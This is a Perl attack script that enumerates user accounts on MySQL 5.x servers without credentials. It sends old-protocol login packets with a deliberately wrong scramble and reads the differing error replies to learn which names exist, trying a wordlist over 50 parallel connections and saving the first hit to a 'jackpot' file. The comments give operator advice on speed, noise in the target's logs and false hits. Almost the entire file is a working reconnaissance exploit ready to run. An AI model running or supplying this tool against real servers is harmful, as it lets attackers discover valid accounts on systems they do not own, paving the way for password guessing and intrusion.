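# MySQL User Account Enumeration Utility
#
# How it works: the client side of the pre-4.1 ("old") MySQL handshake is
# sent to a MySQL 5.x server with a deliberately wrong scramble. For an
# unknown account the server answers "Access denied ..."; for an existing
# account it answers with a different error text, which makes account
# enumeration possible without valid credentials. One TCP connection is
# needed per name tried, so attempts are parallelised with
# Parallel::ForkManager (CPAN), $numforks at a time.
#
# Figures recorded by the original author: ~20000 names in 7 minutes.
#   Mon Jan 16 09:00:18 UTC 2012
#   Mon Jan 16 09:07:26 UTC 2012
#   root@vs2067037:~# wc -l MEDIUM.LST
#   21109 MEDIUM.LST
#
# Examples:
#   root@vs2067037:~# perl mysqlenum.pl host usernames.txt
#
#   [*] HIT! -- USER EXISTS: administrator@host
#
# Caveats for the operator:
#   * The decision rule is purely "the reply does not say Access denied", so
#     an unrelated server error (e.g. connection limit reached, client host
#     not allowed) would also look like a hit. The server's reply text is
#     printed with every hit so it can be checked; a dropped or empty reply
#     is treated as a connection error and retried, never as a hit.
#   * The scan stops at the FIRST hit and also records it in ./jackpot; rerun
#     with the found name removed from the wordlist to enumerate further.
#   * Noisy: every attempt is a failed login in the target's logs.
#   * Blank lines in the wordlist are tried as the empty (anonymous) user.
use IO::Socket;
use Parallel::ForkManager;
use strict;
use warnings;

$| = 1;    # unbuffered STDOUT so progress lines from the children appear promptly

if (@ARGV != 2) {
    print "Usage: mysqlenumerate.pl <target> <wordlist>\n";
    exit;
}
my ($target, $wordlist) = @ARGV;
my $numforks    = 50;          # parallel connections; keep below the server's max_connections
my $max_retries = 5;           # connect/reply attempts per name before giving up on it
my $io_timeout  = 15;          # seconds for connect + handshake + reply of one attempt
my $hit_file    = 'jackpot';   # a hit is also recorded here, in the current directory

# Read the whole wordlist up front (3-arg open, checked). CRLF files are tolerated.
my @users = do {
    open my $fh, '<', $wordlist or die "Cannot open wordlist '$wordlist': $!\n";
    my @names = <$fh>;
    close $fh;
    chomp @names;
    s/\r//g for @names;
    @names;
};

# Build the old-protocol client authentication packet for $user: a 4-byte
# header (3-byte little-endian payload length, sequence number 1) followed by
# the fixed capability/max-packet bytes, the NUL-terminated username and a
# fixed 8-byte scramble response ("PN_QUEME", NUL-terminated) that is not
# expected to be correct for anyone.
sub auth_packet {
    my ($user) = @_;
    my $payload = "\x8d\x00\x00\x00\x00" . $user . "\x00" . "PN_QUEME\x00";
    # pack('V') yields 4 little-endian bytes; the MySQL header uses the low 3,
    # so names longer than 255 bytes get a correct length instead of a wrapped one.
    return substr(pack('V', length $payload), 0, 3) . "\x01" . $payload;
}

# Perform one login attempt as $user against $target:3306.
# Returns the server's raw reply to the auth packet, or nothing when the
# connection could not be made, timed out, or was dropped without an answer.
sub try_login {
    my ($user) = @_;
    my $reply = '';
    my $ok = eval {
        local $SIG{ALRM} = sub { die "timeout\n" };
        alarm $io_timeout;    # recv() has no timeout of its own; a silent server would hang the child
        my $sock = IO::Socket::INET->new(
            PeerAddr => $target,
            PeerPort => '3306',
            Proto    => 'tcp',
            Timeout  => 10,
        ) or die "connect\n";
        my $greeting = '';
        recv($sock, $greeting, 1024, 0);    # server greeting; its content is not used
        print {$sock} auth_packet($user);
        my $got = recv($sock, $reply, 1024, 0);
        close $sock;
        alarm 0;
        defined $got && length $reply;
    };
    alarm 0;
    return unless $ok;
    return $reply;
}

my $found = 0;
my $pm = Parallel::ForkManager->new($numforks);
# A child reports a hit through its exit code (finish(1)) and the parent sees
# it in this callback. This replaces the old shared flag file in /tmp: a
# predictable name in a world-writable directory that another local user
# could pre-create (silently stopping the scan) or point, via a symlink, at a
# file this script -- typically run as root -- would then truncate.
$pm->run_on_finish(sub {
    my ($pid, $exit_code) = @_;
    $found = 1 if $exit_code;
});

# Every entry is tried, including the first one (the old 1-based counter
# skipped $users[0]). Parallel::ForkManager blocks in start() while $numforks
# children are running, which is also when the finish callback above runs.
my $tried = 0;
USER: for my $user (@users) {
    last USER if $found;
    $tried++;
    $pm->start and next USER;    # parent continues with the next name; child runs the attempt

    my $reply;
    for my $attempt (1 .. $max_retries) {
        $reply = try_login($user);
        last if defined $reply;
        print "Connect Error\n";
        sleep 1;
    }
    $pm->finish(0) unless defined $reply;    # no answer at all is not evidence of a user

    print $reply . "\n" if $tried % 100 == 0;    # occasional raw-reply sample as a progress sign

    # In the old-protocol error packet the message starts at offset 7
    # (4-byte header, 0xFF error marker, 2-byte error code).
    # "Access denied ..." means the account is unknown (or, for an account with
    # an old-format password hash, simply a wrong password).
    my $msg = length($reply) > 7 ? substr($reply, 7) : '';
    $pm->finish(0) if $msg =~ /^Access/;

    (my $printable = $msg) =~ s/[^[:print:]]//g;
    my $line = "\n[*] HIT! -- USER EXISTS: $user\@$target\n";
    print $line;
    print "[*] server reply: $printable\n";    # lets the operator spot unrelated errors
    if (open my $out, '>', $hit_file) {
        print {$out} $line;
        close $out or warn "Error writing $hit_file: $!\n";
    }
    else {
        warn "Cannot write $hit_file: $!\n";
    }
    $pm->finish(1);
}
$pm->wait_all_children;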